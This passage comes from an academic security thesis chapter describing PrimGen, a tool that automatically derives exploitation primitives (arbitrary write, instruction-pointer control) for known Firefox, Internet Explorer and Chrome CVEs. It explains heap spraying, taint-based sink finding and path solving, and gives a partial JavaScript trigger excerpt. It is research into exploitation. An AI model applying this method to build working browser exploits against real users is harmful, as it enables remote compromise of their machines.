3) Preparing attacker memory. Before an attacker exercises the vulnerability via the VUT, she usually prepares regions of memory which enable an illegitimate action with the bug later on. This is, for instance, the case for spatial memory errors such as buffer overflows. An attacker may utilize the browser’s scripting engine to create and place specific JS objects after an object with the buffer overflow vulnerability on the heap [157]. This serves the purpose of overwriting the specific object once the bug is triggered. Similarly, freed memory regions may be reclaimed by attacker-controlled objects to support temporal memory errors such as use-after-free bugs [93]. As soon as the vulnerability is triggered, the attacker operates on the prepared object with the dangling pointer. Another bug class which may need prepared memory is the use of uninitialized variables. If the attacker manages to fill the stack with controlled values, e.g., via stack spraying [87, 135], the uninitialized variables are filled with controlled values when the bug triggers. This extends attacker control beyond the initial control point. Generally speaking, preparing attacker memory happens before the vulnerability is triggered, and these preparations are normally performed with a heap spray. Heap spraying can be seen as a black box, as one heap spray usually works reliably on a browser across (minor) version updates. Our analysis is based on a VUT with an extended, basic heap spray as input. Starting from this state, we aim at modifying the to-be-sprayed JS objects in order to extend attacker control from control sources to attacker sinks in the target program flow, as we explain next.

4) Exercising an attacker primitive. At this point in the exploit development process, the attacker has a VUT which (i) triggers the vulnerability, (ii) fosters basic control over register/memory, and (iii) enables further execution towards yet unknown program sinks. As soon as the vulnerable program executes beyond the initial control point, it operates on attacker-controlled memory prepared via, e.g., heap spray. The control flow is already illegitimately influenced, and furthermore, an action of the attacker’s choice should be exercised next. We name the program point where this specific action takes place attacker sink. The execution flow, starting at the control point and eventually landing in the attacker sink, is called exploitation primitive. Put differently, an exploitation primitive executes from the control point, whereby controlled data from prepared memory (e.g., heap spray) influences branches and directs the control flow towards intended attacker sinks. Ultimately, a sink performs the attacker’s desired action(s). We choose the following sinks as targets for exploitation primitives, mainly because they are necessities of subsequent steps such as arbitrary code execution:

• Write-Where (WrW): The attacker manages to propagate controlled data into a sink with a limited-write instruction such as an increment, decrement, arithmetic, or bitwise operation on controlled memory. Expressed in x86 assembly, a popular example is inc [controlled]. Usually, this sink is used to change a data field such as the length field of an internal browser object. This object can then be misused to illegitimately read, write, or corrupt memory in the address space arbitrarily.

• Write-What-Where (WWW): This sink contains instructions which allow arbitrary memory writes, in which the attacker controls the value (val) and the destination (dst), e.g., mov [dst], val. Similarly, this sink serves to corrupt memory in order to be able to perform more malicious computations

in the target process. For example, if val is a pointer into a shared library, this sink may serve the purpose to create an information leak and bypass ASLR.

• Control over the Instruction Pointer (EIP): EIP sinks allow control over the instruction pointer: an indirect call with attacker-controlled values redirects the control flow. This is often possible in browsers at virtual function call sites, such as call [controlled].
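The sink taxonomy above can be summarized as a small decision function. The sketch below is purely illustrative: the tuple-based instruction summary and the classify_sink helper are our own stand-ins, not PrimGen's internal representation.

```python
# Illustrative sketch of the sink taxonomy (WrW / WWW / EIP).
# An "instruction" is a hypothetical (kind, dst, src) summary; `tainted`
# is the set of attacker-controlled registers at that program point.

def classify_sink(insn, tainted):
    kind, dst, src = insn          # e.g. ("store", "edi", "esi")
    if kind == "indirect_call" and dst in tainted:
        return "EIP"               # call [controlled]
    if kind == "store" and dst in tainted:
        # The destination address is controlled; if the written value is
        # controlled too, the write is fully arbitrary (Write-What-Where).
        return "WWW" if src in tainted else "WrW"
    return None

assert classify_sink(("indirect_call", "eax", None), {"eax"}) == "EIP"
assert classify_sink(("store", "edi", "esi"), {"edi", "esi"}) == "WWW"
assert classify_sink(("store", "edi", "esi"), {"edi"}) == "WrW"
```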

The main automation task we accomplish is to generate JS code which triggers an exploitation primitive, i. e., the execution of the program path between the control point and the attacker sink. Attacker-controlled data in the form of JS objects has to be carefully crafted such that the program executes this program path once the vulnerability is triggered. As a result, we generate JS/HTML files based on VUTs to perform the intended exploitation primitive. We call these result files exploitation primitive trigger (EPT). Usually, searching and finding a desired exploitation primitive, analyzing the corresponding program path, and crafting the data fields correctly is a cumbersome process, as this is mostly performed manually and such program paths may consist of many basic blocks. Our aim is to fully automate all parts of this step, as we explain in § 4.2.

5) Finalizing the exploit. Usually, after an EPT has executed, the attacker has a higher level of control within the browser process, either because she has overwritten a security flag and is able to run high-privileged JS [129], or because she is performing arbitrary computations via code-reuse techniques after gaining EIP control. Both are possible means to exploit a vulnerability in the OS kernel to further escalate privileges. However, we consider this step as future work and currently out of scope.

4.2 Design

In the following, we describe the design and overall architecture of our approach towards automating and assisting the process of exploitation in browsers as implemented by PrimGen. An overview of the architecture is shown in Figure 4.1. Our prototype is split into two main phases consisting of several components.

1) Preprocessing. The preprocessing corresponds to the operations performed by the frontend of Mentalese (see Section 3.3). Since we operate on the whole target binary, our first step is to reconstruct the CFG of each function using off-the-shelf binary frameworks, transform it into JSON, and feed it into Mentalese. Each function is then lifted into SymIL, which is in static single assignment (SSA) form. Finally, we collect data such as function entries, register uses/definitions, memory reads/writes, and control-flow information as presented in Table 3.1 and generate the Mental-IR (see Section 3.1.2). An extension on top of Mentalese implemented by PrimGen is to incorporate trace/control-flow and memory information obtained with dynamic analysis (debugger or tracer). This is achieved by executing the target program with the VUT in a debugger, with a breakpoint set at the control point. Hence, a dynamic trace and a memory dump are extracted as soon as the breakpoint is hit.

2) Postprocessing. The postprocessing corresponds to the operations performed by the backend of Mentalese plus extensions implemented by PrimGen. After having determined the locations of a control point, we start the taint analysis to find reachable sinks; based on this information, we form a graph that describes the flow of control from one basic block to another. With this graph in place, paths to our intended sinks are symbolically executed and filtered out beforehand if they are not solvable. The remaining paths lead us to potential exploit primitives, and data needs to be crafted to reach them. In this step, all constraints related to controlled data are collected and used to build memory maps; these maps provide an overview of how the objects need to be crafted. Using a memory dump that is acquired at the time the control point is hit, we verify every satisfiable path that has a memory map attached. This is achieved in a platform-agnostic manner. The process can also be seen as an additional filtering layer. Finally, given a template (e.g., a VUT with a basic heap spray, see § 4.1), our prototype generates scripts to be fed into the browser (EPT). Depending on the binary (note that browsers are huge), the first phase might take up to several hours. Therefore, we extract only those functions in the binary that are reachable from the control point. If the analysis reaches a point where further functions are needed, they are added to our IR on demand.

Control over the Instruction Pointer

IPControl(taint_descr, color, bb, order, ctx) :-
    IndirectCall(base, disp, access, bb, order, ctx),
    Taint(base, disp, access, taint_descr, color, _, _, ctx).

Write-Where

WriteWhere(taint_descr, color, bb, order, ctx) :-
    Memory(_, "store", _, _, disp, bb, order, ctx),
    Register(_, base, "d", _, bb, order, ctx),
    Taint(base, -1, "R", taint_descr, color, _, _, ctx).

Write-What-Where

WriteWhatWhere(taint_descr, color, bb, order, ctx) :-
    WriteWhere(taint_descr, color, bb, order, ctx),
    Register(_, what_reg, "u", _, bb, order, ctx),
    Taint(what_reg, -1, "R", taint_descr, color, _, _, ctx).

Indirect Call

IndirectCall(base, disp, access, bb, order, ctx) :-
    Register(_, f_ret_reg, "u", _, bb, order, ctx),
    match("f_ret_.*", f_ret_reg).

Figure 4.2: Rule Set: Tainted Sinks.

4.2.1 Finding Sinks

In the previous chapter, we presented how taint analysis is implemented by Mentalese. A taint analysis is incomplete without its security policies, i.e., the sinks that are reached by taint. In the same manner in which we described the analysis derivatives and their transparent interplay due to our Datalog approach, we define our sinks. Once the Taint rules reach their fixpoint, we use glue-rules as defined in Section 3.5.1 to derive our sinks. We are interested in sinks that have the characteristics of a WrW, WWW, or EIP primitive. In Figure 4.2 we present a rule set of glue-rules to derive these sinks. The second rule looks for a controlled store, e.g., a store to a memory cell at base+disp where base is tainted. The Write-What-Where rule is glued to the Write-Where rule: we first look for a Write-Where primitive, and then check for a register use (what_reg) that is tainted. The rule abstracts away the characteristics of the what-expression in the sense that we only care about what is used and what we control. For instance, the register uses can be part of an equation where the property, the equation itself, is ignored by the rule. The only information we are interested in is that we can write controlled data.

The first rule states that we obtain IP control if we have an indirect call and the operands of that call, described by (base, disp, access), are tainted. The IndirectCall literal can either be generated by the frontend of Mentalese by catching call instructions and producing EDB facts, or we can use the backend and write a rule to derive them. For the latter choice, we can utilize the SymIL extensions as presented in Section 3.3.2, in particular the f_ret_* registers. Recall that these pseudo registers represent return values, and we use them to mimic a call whose return value is written to a return-receiver in the caller context. Thus, whenever we see an f_ret_* pattern, we can check whether a register name matches. This works well for indirect calls through registers, but increases the complexity of the rule set once indirect calls through memory dereferences occur, as is the case for the x86 architecture. We have therefore decided to leave this burden to the frontend and extend Mentalese to generate IndirectCall facts.
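To illustrate how such glue-rules compose, the following Python sketch mimics the Write-What-Where join from Figure 4.2 over hand-written fact tuples. The schemas are simplified stand-ins for the actual EDB/IDB relations, and the fixpoint machinery is omitted.

```python
# Toy illustration of a Datalog-style glue-rule: derive WriteWhatWhere
# facts by joining WriteWhere with tainted register uses at the same
# program point, as in Figure 4.2. Fact schemas are simplified stand-ins.

write_where = {("t1", "red", "bb7", 3, "ctx0")}        # (descr, color, bb, order, ctx)
register_use = {("what_reg1", "u", "bb7", 3, "ctx0")}  # (reg, access, bb, order, ctx)
taint = {("what_reg1", "ctx0")}                        # (reg, ctx): tainted registers

def derive_www(write_where, register_use, taint):
    out = set()
    for (descr, color, bb, order, ctx) in write_where:
        for (reg, access, rbb, rorder, rctx) in register_use:
            # Join on the program point and require the used register
            # (the "what") to be tainted as well.
            if access == "u" and (bb, order, ctx) == (rbb, rorder, rctx) \
               and (reg, ctx) in taint:
                out.add((descr, color, bb, order, ctx))
    return out

assert derive_www(write_where, register_use, taint) == {("t1", "red", "bb7", 3, "ctx0")}
```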

Running Example

During our evaluation of CVE-2016-9079, a use-after-free in Firefox 50.0.1, our tool generated an input following a path to an indirect call. We think that this specific case is complex, yet easy enough to clarify the concepts of this work. Figure 4.4 illustrates our running example, which we repeatedly refer to throughout this chapter. The figure shows three illustrations which we cover in the course of the next sections. For now, consider the assembly code along a path generated by PrimGen. The code runs from the control point at 0x107a00d4 into an indirect call sink at 0x101c0cb8. The value in ecx at 0x107a00d7 is the memory region that the attacker controls through a JS object. The interested reader can find the VUT code leading to the control point in Listings A.1 and A.2 in Appendix A. It is based on code from the corresponding Mozilla Bug Report [195].

4.2.2 Program Paths

Upon taint generation, we build a graph that represents how control flows from one basic block to another until it reaches a sink. We refer to this graph as the Taint Propagation Graph (TPG), which is illustrated in Figure 4.3. Leaf nodes in this graph are tainted sinks. The edges are labeled with a (from, to) propagation property. For instance, ecx_2 in 0x107a00d4 is propagated to ecx in 0x11521448. Note how ecx_2 in 0x107a00d4 is propagated along two calls to its non-subscripted counterpart ecx in 0x11521448. This is achieved with the PassThrough rules which we introduced in Section 3.4.4. Please refer to Figure 4.4 to see the control flow between these two nodes.

Figure 4.3: Taint Propagation Graph (TPG) of our running example: leaf nodes are attacker sinks.

Figure 4.4: Running example (CVE-2016-9079): path generated from the control point at 0x107a00d4 into an indirect call sink at 0x101c0cb8. On the left side, the assembly code is shown which is executed along the path into the sink. Each generated path is associated with a memory map; all offsets are relative to the base address. The arrows indicate the mapping to a controlled memory region. Each memory map is transformed into a tree structure.

The figure also clarifies that nodes in the TPG are not necessarily connected by an edge in the CFG, leaving us with gaps between these nodes. The TPG can basically be seen as a forward slice from the control point to the targeted attacker sink. Our aim in this process is to generate paths between the nodes in the TPG to close these gaps. However, hundreds of basic blocks can lie between these sliced nodes, with conditions that contradict each other and lead to unsatisfiable paths. We start our approach by generating paths ahead of time, before we check their satisfiability. This is done in a breadth-first manner, restricted to realizable paths. A realizable path respects the call stack, i.e., when a function returns, it continues at the correct call site. We send these paths to the symbolic execution engine.
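The gap-closing step can be pictured as a bounded breadth-first search over the CFG. The sketch below is a simplification: the cfg successor map is a hypothetical stand-in, and call-stack realizability is ignored.

```python
# Sketch: enumerate basic-block paths between two TPG nodes, bounded by
# a maximum "gap" of intermediate blocks, in BFS (shortest-first) order.
from collections import deque

def paths_between(cfg, src, dst, max_gap):
    """cfg: {block: [successor blocks]}. Returns paths src -> dst with at
    most max_gap intermediate blocks."""
    queue = deque([[src]])
    found = []
    while queue:
        path = queue.popleft()
        node = path[-1]
        if node == dst:
            found.append(path)
            continue
        if len(path) - 1 > max_gap:   # too many intermediate blocks already
            continue
        for succ in cfg.get(node, []):
            if succ not in path:      # simple cycle guard
                queue.append(path + [succ])
    return found

# Block addresses loosely borrowed from Figure 4.3 for illustration.
cfg = {"0x107a00d4": ["0x11521448"],
       "0x11521448": ["0x101c0c96", "0x101c0d0e"],
       "0x101c0c96": ["0x101c0cb8"]}
paths = paths_between(cfg, "0x107a00d4", "0x101c0cb8", 2)
assert len(paths) == 1
```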

Symbolic Execution

To lighten the burden on the symbolic execution engine, we maintain a trie data structure over all the paths that were sent. Paths can be represented as strings, which allows us to use string-searching algorithms to process the trie [3]. In each node of the trie, we additionally store metadata indicating whether the node kills the taint and whether the path prefix is satisfiable, along with its symbolic state. We only save states in nodes that are satisfiable. The idea behind this is to prioritize paths that reach the sink through basic blocks where controlled data is processed. This gives an attacker a valuable overview of how much she can influence along different paths to the corresponding sinks. Whenever we generate a path ahead of time, we consult the trie to check whether the path is satisfiable up to some prefix. In this manner, we avoid recomputing paths that have an unsatisfiable prefix. If a new path string is encountered, we update the trie and send the path to the symbolic execution engine.
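A minimal version of this path trie, with per-node unsatisfiability flags used to prune shared prefixes, could look as follows. This is an illustrative sketch, not PrimGen's actual data structure, and it omits the taint-kill flag and stored symbolic states.

```python
# Sketch: a trie over basic-block paths. A node marked unsat means every
# path sharing that prefix can be skipped without re-querying the solver.

class TrieNode:
    def __init__(self):
        self.children = {}
        self.unsat = False   # prefix proven unsatisfiable

class PathTrie:
    def __init__(self):
        self.root = TrieNode()

    def mark_unsat(self, path):
        node = self.root
        for bb in path:
            node = node.children.setdefault(bb, TrieNode())
        node.unsat = True

    def has_unsat_prefix(self, path):
        node = self.root
        for bb in path:
            if bb not in node.children:
                return False
            node = node.children[bb]
            if node.unsat:
                return True
        return False

trie = PathTrie()
trie.mark_unsat(["0x107a00d4", "0x11521448"])   # addresses from Figure 4.3
assert trie.has_unsat_prefix(["0x107a00d4", "0x11521448", "0x101c0c96"])
assert not trie.has_unsat_prefix(["0x107a00d4", "0x101c0d0e"])
```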

Path Explosion

Since the number of paths can grow exponentially, we vary the gap size until we reach a given coverage of sinks or a specified number of generated paths. By gap size we refer to the maximum number of basic blocks that are allowed to lie between the nodes in the TPG. We obtained the best results in terms of speed and quality with a gap size between 15 and 20. Each path is sorted by its length and priority; paths where we control the branch conditions have a higher priority and are processed first. To further cope with path explosion, we skip calls to functions that do not touch any controlled data. We use heuristics to decide which calls to skip in order to keep the paths as simple as possible, summarized as follows:

• The callee does not lead us to a specific location where controlled data flows into a desired sink.

• The call site is postdominated by the target location, in which case we reach the target location anyway.

• The call does not touch any controlled data.

The former two rules enforce call skipping even if the callee touches tainted data. This choice reduces complexity; however, it can lead to unpleasant scenarios. One such scenario occurred for mshtml.dll (CVE-2014-0322), where we encountered an interplay between a user-controlled buffer and a sprayed heap buffer. Due to the choices above, our system might generate input that crashes before a controlled sink is reached. In this case, PrimGen puts the input in a queue for further processing once the validation of all inputs is done. To find the cause of the conflict, we intercept the crash and investigate whether any tainted data is involved in the crash at a point where a function skip occurred. If so, the path generation for this specific case is repeated, this time including the skipped functions. To avoid regenerating existing path prefixes up to the point where the function was skipped, we cache each path in the trie. The path generation starts from the entry point of the skipped function and continues until it reaches its call site in the caller. The resulting paths are then stitched onto the satisfiable path prefixes.
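Taken together, the three heuristics amount to a simple predicate. The sketch below assumes the three conditions are supplied by the surrounding CFG and taint analyses; the function name and signature are our own illustration.

```python
# Hedged sketch of the call-skipping heuristics: skip the call if the
# callee cannot reach the sink, if the call site is postdominated by the
# target (we get there anyway), or if no controlled data is touched.

def should_skip_call(callee_reaches_sink, callsite_postdominated, callee_touches_taint):
    return (not callee_reaches_sink) or callsite_postdominated or (not callee_touches_taint)

assert should_skip_call(False, False, True)    # rule 1: callee cannot reach sink
assert should_skip_call(True, True, True)      # rule 2: postdominated call site
assert should_skip_call(True, False, False)    # rule 3: no controlled data touched
assert not should_skip_call(True, False, True) # otherwise: descend into the callee
```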

Memory Maps

Recall that we search for paths between the control point and an attacker sink. Attacker-controlled data by means of objects placed at predictable locations have to be crafted carefully, such that the program follows the path into the sinks to perform the wanted primitive. These paths are computed to prefer basic blocks which process controlled data. We symbolically execute paths between source and sinks and gather constraints that are dependent on controlled data. Paths that run into unsatisfiable conditions are discarded. Based on the constraints, we build a memory map along with possible minimum and maximum values to be stored into the corresponding memory cells and which preserve the satisfiability of the path. We further incorporate metadata into each memory cell to keep track of instructions which introduced the constraints. This procedure is best explained by example and we refer to our running example illustrated in Figure 4.4. Recall that the value in ecx at 0x107a00d7 is the memory region that the attacker controls through a JS object. At offset 0xac, a dereference 4. Towards Automated Generation of Expl. Primitives for Web Browsers 101

occurs and its value has to be equal to 1 to satisfy the jump condition to 0x107a00ed. The memory map on the right side shows this coherence. The base address of the map is set to 0xd0000f54 in our case, but can be set to any value afterwards. The corresponding addresses in the cells are rebased accordingly. At 0x11521448, the value of ecx (offset 0 in the map) is dereferenced, loaded into ecx which flows into edi at 0x101c0c9a where it serves as a base address for the next jump condition. Note that this value is again a memory region controlled by the attacker. The value at offset 0x10ac=0x1094+0x18, can be set to 0x5 or 0xff as indicated in the map through the min and max values. These min/max values usually describe a range from which we can pick a value; however, in this case, the test instruction performs an and operation which restricts the value to be chosen. To avoid bad characters which can be induced by zeros, we usually choose the max value. For some memory cells, as for the one used in the sink, the range between min and max is the maximum word size (0xffffffff), depending on whether we are running a 32 or 64bit process. Whenever we encounter such a range, we use it as an indicator to place an address at that cell that points back into a attacker controlled area. However, we also need to account for loop conditions that we might control. Setting the value to high might lead the execution to run forever. We use a weak topological sorting algorithm that partitions each loop in the process of topological sort [24]. This allows us to spot controlled data that is processed in the head of a loop. If controlled data runs into a flag condition it indicates that we control the loop condition. In this case we need to find a suitable value. Each memory map is transformed into a tree structure which simplifies the process of following dereference chains. The base is the root of the tree and each entry in the map is a node. 
Nodes are connected with an edge if a dereference occurs on that cell that points to another cell (see Figure 4.4).
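The cell and tree structure described above can be sketched in Python. This is a simplified model, not our actual implementation: the offsets and ranges are taken from the running example, while the class layout and the zero-avoidance heuristic mirror the description in the text.

```python
class Cell:
    """One memory-map entry: an offset relative to the controlled base,
    the [vmin, vmax] range that preserves path satisfiability, and
    outgoing dereference edges to other cells (the tree structure)."""
    def __init__(self, offset, vmin, vmax):
        self.offset = offset
        self.vmin = vmin
        self.vmax = vmax
        self.children = []   # cells reached by dereferencing this cell

WORD_MAX = 0xFFFFFFFF        # maximum word size in a 32-bit process

def pick_value(cell, base_addr):
    """Choose a concrete value for a cell. A full-width [min, max] range
    marks an unconstrained cell: we point it back into the controlled
    area (here: at its first child's offset). Otherwise we prefer the
    max value to avoid zero bytes (bad characters)."""
    if cell.vmax - cell.vmin == WORD_MAX and cell.children:
        return base_addr + cell.children[0].offset
    return cell.vmax

# Cells from the running example: *(base+0xac) must equal 1 to take the
# jump to 0x107a00ed; *(base+0x10ac) may be 0x5 or 0xff.
base = 0xd0000f54
root = Cell(0x0, 0x0, WORD_MAX)           # unconstrained: becomes a pointer
root.children.append(Cell(0x10ac, 0x5, 0xff))
flag = Cell(0xac, 0x1, 0x1)

print(hex(pick_value(flag, base)))              # 0x1
print(hex(pick_value(root.children[0], base)))  # 0xff: max, no zero byte
print(hex(pick_value(root, base)))              # rebased pointer into the map
```

Picking the max value keeps the chosen byte pattern free of zeros, which matters once the recipe is embedded into a JS string or spray buffer.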

Verify

Due to the lack of context (state) information, each satisfiable path needs to undergo a verification process. In order to verify the paths in a platform-agnostic manner, we use a dump that is acquired at the time we hit the control point. Usually this is the moment where, for instance, the heap spray has already occurred. We mimic the effect of different heap spray routines by setting the memory according to our memory maps. In an emulation run, we examine whether our memory settings drive the execution into the desired primitive. Paths that do not fulfill this property are filtered out.
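The filtering step can be modeled in a few lines of Python. This is a deliberately simplified stand-in: the dictionaries play the role of the dump and the memory map, and the branch checks stand in for the actual Unicorn emulation; all names and addresses are illustrative.

```python
def verify(dump, memory_map, branch_checks):
    """Overlay the memory map on a process dump (mimicking the heap
    spray), then check every branch condition along the candidate path.
    The path survives only if all conditions hold, i.e., if execution
    would reach the sink. The real system emulates the dump instead."""
    mem = dict(dump)
    mem.update(memory_map)
    return all(mem.get(addr) == want for addr, want in branch_checks)

base = 0xd0000f54
dump = {base + 0xac: 0x0}            # stale data before the spray
memmap = {base + 0xac: 0x1}          # value dictated by the memory map
checks = [(base + 0xac, 0x1)]        # jump condition on the path

print(verify(dump, memmap, checks))  # True: path is kept
print(verify(dump, {}, checks))      # False: path is filtered out
```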

4.2.3 Triggering Input

To generate code that triggers a given exploitation primitive, an attacker has to deliver a manually crafted template file. This template file contains the VUT and, if required, a routine to prepare attacker memory, which is usually achieved through heap spraying. The code snippet in Figure 4.5 shows an excerpt of an EPT for our running example generated from a template file.

 1 function prepare_memory(){...}
 2 function VUT(){...}
 3 function set(offset, value){...}
 4 base_addr = ...
 5 /* automatically generated code */
 6 function gen(){
 7   set(0x70, base_addr+0x110);
 8   set(0xac, 0x1);
 9   set(0x0, base_addr+0x1094);
10   set(0x10ac, 0xff);             // 0x1094+0x18=0x10ac
11   set(0x10a8, base_addr+0x20ac); // 0x1094+0x14=0x10a8
12   set(0x20ac, base_addr+0x2f74); // 0x20ac+0x0=0x20ac
13   set(0x30ac, base_addr+0x220);  // 0x2f74+0x138=0x30ac
14 }

Figure 4.5: JS EPT excerpt.

The VUT and the memory preparation stabilize control over the memory regions through JS objects. Our memory tree structures from the previous step are used to generate a recipe for how the objects need to be crafted to trigger the attacker's sink. The gen function is generated by PrimGen and delivers this recipe. Again, recall our example illustrated in Figure 4.4: for offset 0xac, PrimGen generates set(0xac, 0x1), which conforms to line 8 in Figure 4.5. The set function invocations write the values to the corresponding offsets in user-controlled memory. When heap spraying is involved, the gen procedure is embedded into the heap spraying routine. Line 9 represents the connection from 0xd0000f54 to the node with offset 0x0 in our memory tree. The memory tree has two outgoing edges to 0x10ac and 0x10a8, which conform to lines 10 and 11, respectively. At offset 0x70 we have an unconstrained value, in which case an unused address into user-controlled memory is chosen. The number of lines generated depends on the complexity of the path, i.e., its length, the number of constraints referring to controlled data, interplay with the heap, and possibly user-defined buffers. A full presentation of the VUT, the template, and the generated EPT can be found in Appendix A.
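The recipe emission itself can be sketched as a walk over a flattened view of the memory tree. The encoding below (a dict mapping offsets to either a concrete value or a pointer target) is a hypothetical simplification; the offsets are the ones from Figure 4.5, lines 8 to 11.

```python
def emit_recipe(cells):
    """Emit the body of gen() from a flattened view of the memory tree.
    cells maps offset -> ('val', v) for a constrained cell, or
    ('ptr', target_offset) for a dereference edge (hypothetical encoding)."""
    js = []
    for off, (kind, v) in sorted(cells.items()):
        if kind == 'val':
            js.append(f"set({hex(off)}, {hex(v)});")
        else:
            js.append(f"set({hex(off)}, base_addr+{hex(v)});")
    return js

# Offsets taken from the running example (Figure 4.5, lines 8-11).
cells = {
    0xac:   ('val', 0x1),     # jump condition: *(base+0xac) == 1
    0x0:    ('ptr', 0x1094),  # root cell points back into the map
    0x10ac: ('val', 0xff),    # 0x1094+0x18: pick max to avoid zero bytes
    0x10a8: ('ptr', 0x20ac),  # 0x1094+0x14: next dereference edge
}
for line in emit_recipe(cells):
    print(line)
```

The emitted lines are then spliced into the template between the VUT and the heap spray routine, yielding the gen function shown in Figure 4.5.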

4.2.4 Implementation Details

PrimGen is built on top of Mentalese. We used IDA Pro to retrieve the CFG of each function in the binary and feed it into Mentalese. Recall that the input needs to follow a simple JSON encoding; thus, any control flow recovery tool can be applied and interfaced with Mentalese. Paths that we generate undergo a satisfiability check through symbolic execution. We implemented our symbolic execution component on top of ANGR [182], a platform-agnostic binary analysis framework. The reason for this choice was its capability to expose an API for 1) skipping functions, 2) loading memory dumps, and 3) emulating code via Unicorn. Once we generate the paths between source and sinks, as described in Section 4.2.2, we force the symbolic execution engine to follow one path at a time and check its satisfiability. ANGR supports the Unicorn engine, a QEMU-based emulator, which we use for our verification procedure. We feed a dump into ANGR, set the memory values according to our memory maps, and start the emulation process until we hit our sink. This is done for every sink and every satisfiable path that hits the sink. If this procedure is successful, the corresponding templates are used to generate EPT scripts.
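The exact JSON schema expected by Mentalese is not spelled out in this excerpt; as an illustration, a recovered CFG could be serialized along the following lines. All field names and addresses here are hypothetical and only show that any recovery tool can emit such an encoding.

```python
import json

# Hypothetical JSON shape for one recovered function CFG. Any control
# flow recovery tool (IDA Pro, Ghidra, ...) could be adapted to emit
# this; the concrete schema used by Mentalese may differ.
cfg = {
    "function": "sub_107a00b0",
    "entry": "0x107a00b0",
    "blocks": [
        {"start": "0x107a00b0", "end": "0x107a00d7",
         "succs": ["0x107a00ed", "0x107a00e0"]},   # conditional jump
        {"start": "0x107a00ed", "end": "0x107a00f4", "succs": []},
        {"start": "0x107a00e0", "end": "0x107a00e8", "succs": []},
    ],
}

encoded = json.dumps(cfg)
decoded = json.loads(encoded)
print(decoded["entry"], len(decoded["blocks"]))
```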

4.3 Evaluation

We evaluate our system on a corpus of several CVE cases targeting the browsers Internet Explorer, Mozilla Firefox, and Google Chrome. For each test case we used an existing proof-of-concept, which we refer to as the original PoC. We used these original PoCs as ground truth to verify whether we can trigger the same attacker sinks. We used the VUTs to determine attacker-controlled data at the first dereferenced move into a CPU register. PrimGen is then fed with the VUT, the binary, and a template file. Our measurements are performed on a machine with Intel Xeon E5-2667 CPUs @ 2.90GHz, 96GB RAM, and 12 cores.

4.3.1 Exploitation Primitive Trigger (EPT)

PrimGen is able to generate several EPT scripts for all CVE case studies. Table 4.1 summarizes our analysis results. Overall, we found 486 different and unique ways to trigger exploitation primitives, for which 48 usable EPT scripts were generated. These 486 ways are alternatives to trigger the primitives and diverge from the original PoC. For CVE-2016-9079 and CVE-2014-1513, we achieved full coverage of all attacker sinks. Note that some EPT inputs trigger the same primitive, which explains the higher number of EPTs for CVE-2016-9079. In this case the system generated 33 EPT scripts that reach the sinks. Since WWW primitives are also WrW primitives, the number of sinks is equal in some case studies. Judging from the specific control point we gain through its VUT, mshtml.dll turns out to be the most affected binary. We discovered that many sinks reside too deep in the interprocedural CFG for our path analysis to cover all of them in a reasonable time. For the same reason, we do not reach the original PoC sink in xul.dll 46.0.1.5966 and xul.dll 44.0.2.5884, as shown in Table 4.1. However, PrimGen found alternative and simpler ways to expand control into the desired attacker sinks. Figure 4.6 shows the satisfiable paths relative to the path length (number of basic blocks). It indicates that paths reaching our sinks are shallow. We argue that these are the more desirable options for an attacker, as they simplify her efforts, but we also acknowledge that there is room for improvement. Note that these paths are checked for satisfiability and further filtered through a verification process.

Figure 4.6: Y-axis: number of satisfiable paths which lead to an attacker sink; X-axis: path length (number of basic blocks). One curve per binary: xul.dll 46.0.1.5966, mshtml.dll 10.0.9200.16384, chrome 35.0.1916.153, and xul.dll 50.0.1.6171.

Please refer to https://github.com/RUB-SysSec/PrimGen for all the data that was generated and used for our evaluation. To clarify the interplay of the JavaScript components, we list them in Appendix A for our running example presented in Figure 4.4.

Table 4.1: Overview of the affected CVEs and our analysis results: The fourth column shows the number of alternative exploit primitives (sinks), denoted as EIP/WWW/WrW. The fifth column shows the number of satisfiable paths which lead to the attacker sinks, denoted in the same fashion as the fourth column. Among these are the generated EPTs, listed in the sixth column. The seventh column lists the number of attacker sinks we cover through EPTs. The eighth column depicts whether the original PoC sink is triggered by any of our inputs. The last column shows the verification time in minutes for satisfiable paths.

Table 4.2: Taint analysis results for the case studies: The third column lists the number of functions reachable from the control point. The fourth column shows the number of functions which operate on controlled data. The last column lists the timings (in seconds) for the taint analysis.

4.3.2 Fine Tuning

In some scenarios the address of the control point is not sufficient. We encountered this issue for CVE-2016-1960. The following assembly snippet shows the corresponding basic block in xul.dll with the address of the control point at 0x1010760e:

0x10107601 mov ecx, [edi+38h]
0x10107604 mov eax, [edi+30h]
0x10107607 lea edx, [eax+ecx*4]
0x1010760a mov [esp+18h+var_4], edx
0x1010760e mov edx, [edx]        ; controlled

Starting at 0x1010760e, taint analysis alone leaves us with no sinks. This example presents a scenario we already visited in Section 3.5.1, where we achieved higher precision with a pointer analysis. If we cannot derive any pointer information with regard to a memory dereference at the control point (like edx in our example), then we run the taint analysis backwards from that point. Here, we use the backward slicer of Mentalese without tracking control dependencies. The analysis stops at a dereference: in this case we encounter edi+0x38 and edi+0x30, both of which are tainted. Each base is treated as a pointer that points to an unknown location. Any aliased location derived by the pointer analysis gets tainted. This expands the facts in Mental-IR about controllable data, which is transparently adapted by all algorithms.
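The effect of this taint expansion can be sketched as a small fixpoint over facts, in the spirit of the Datalog approach. The relation encoding and the alias facts below are hypothetical; only the tainted bases are taken from the snippet above.

```python
def saturate(tainted, alias):
    """Datalog-flavoured fixpoint (hypothetical relation encoding):
    any location aliased by a tainted pointer becomes tainted, and
    the new facts are re-applied until nothing changes -- mirroring
    how every algorithm attached to Mental-IR adapts transparently."""
    changed = True
    while changed:
        changed = False
        for src, dst in alias:
            if src in tainted and dst not in tainted:
                tainted.add(dst)
                changed = True
    return tainted

# From the CVE-2016-1960 snippet: edi+0x38 and edi+0x30 are tainted
# dereference bases; the alias facts are invented for illustration.
tainted = {("edi", 0x38), ("edi", 0x30)}
alias = [(("edi", 0x38), ("heap", 0x0)),   # *(edi+0x38) aliases a heap cell
         (("heap", 0x0), ("heap", 0x8))]   # which in turn aliases another
saturate(tainted, alias)
print(("heap", 0x8) in tainted)  # True: taint reached the aliased cell
```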

4.4 Discussion and Limitations

